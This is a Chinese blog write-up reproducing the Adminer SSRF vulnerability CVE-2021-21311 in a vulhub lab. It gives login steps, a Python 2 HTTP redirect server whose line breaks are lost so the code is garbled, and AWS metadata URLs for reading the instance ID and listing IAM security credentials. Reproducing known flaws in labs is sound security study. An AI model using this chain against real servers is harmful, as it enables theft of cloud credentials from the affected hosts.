当前位置：首页 > news >正文

vulhub中Adminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞复现（CVE-2021-21311）

news 2025/8/14 13:11:30

Adminer是一个PHP编写的开源数据库管理工具，支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。

在其4.0.0到4.7.9版本之间，连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞（SSRF）。

参考连接：

https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml

1.在Adminer登录页面，选择ElasticSearch作为系统目标，并在server字段填写`example.com`，点击登录即可看到`example.com`返回的400错误页面展示在页面中

Vulnerability-Wiki/docs-base/docs/webapp/Adminer-SSRF漏洞-CVE-2021-21311.md at master · Threekiii/Vulnerability-Wiki (github.com)

使用管理员发送任意get请求并从内部服务器检索JSON响应的方法。可以从AWS元数据服务中提取AWS访问密钥。

参考链接：

SSRF in adminer · CVE-2021-21311 · GitHub Advisory Database · GitHub
https://gist.github.com/bpsizemore/227141941c5075d96a34e375c63ae3bd

首先，启动一个python服务器，该服务器侦听传入的连接并以301重定向响应到任意选择的主机。在此示例情况下，重定向指向AWS元数据服务：

http://169.254.169.254/latest/meta-data/instance-id

然后，在Adminer中使用Elasticsearch登录模块“登录”运行python代码的服务器，这导致Adminer从包含服务器的AWS实例ID的元数据服务器打印json响应。

重定向请求的python脚本：

#!/usr/bin/env pythonimport SimpleHTTPServer
import SocketServer
import sys
import argparsedef redirect_handler_factory(url):"""Returns a request handler class that redirects to supplied `url`"""class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):def do_GET(self):self.send_response(301)self.send_header('Location', url)self.end_headers()def do_POST(self):self.send_response(301)self.send_header('Location', url)self.end_headers()return RedirectHandlerdef main():parser = argparse.ArgumentParser(description='HTTP redirect server')parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on')parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on')parser.add_argument('redirect_url', action="store")myargs = parser.parse_args()redirect_url = myargs.redirect_urlport = myargs.porthost = myargs.ipredirectHandler = redirect_handler_factory(redirect_url)handler = SocketServer.TCPServer((host, port), redirectHandler)print("serving at port %s" % port)handler.serve_forever()if __name__ == "__main__":main()

http://169.254.169.254/latest/meta-data/iam/security-credentials/  //列出服务器的可用角色。

vulhub中Adminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞复现（CVE-2021-21311）

相关文章：

vulhub中Adminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞复现（CVE-2021-21311）

浅谈Zookeeper及windows下详细安装步骤

vite, vue3, vue-router, vuex, ES6学习日记

25考研｜660/880/1000/1800全年带刷计划

Mybatis基础教程及使用细节

10 分钟在K8s 中部署轻量级日志系统 Loki

图像处理python基础

基于WordPress开发微信小程序2：决定开发一个wordpress主题

[Python] 什么是网格搜索以及scikit-learn中GridSearch类的介绍和使用案例？

Linux-正则表达式

Java基础学习：System类和Static方法的实际使用

线性代数------矩阵的运算和逆矩阵

Flutter 开发3：创建第一个Flutter应用

Linux中断下半部分：软中断，tasklet和工作队列

Flink CEP实现10秒内连续登录失败用户分析

QSqlRelationalTableModel 关系表格模型

JS和CSS实现的原生轮播图

【微服务】skywalking自定义链路追踪与日志采集

MYSQL基础问题

SpringBoot使用Guava实现日志脱敏（含源码）

铭豹扩展坞 USB转网口突然无法识别解决方法

基于大模型的 UI 自动化系统

应用升级/灾备测试时使用guarantee 闪回点迅速回退

.Net框架，除了EF还有很多很多......

【JVM】- 内存结构

关于iview组件中使用 table , 绑定序号分页后序号从1开始的解决方案

.Net Framework 4/C# 关键字（非常用，持续更新...）

Java线上CPU飙高问题排查全指南

保姆级教程：在无网络无显卡的Windows电脑的vscode本地部署deepseek

【JavaSE】多线程基础学习笔记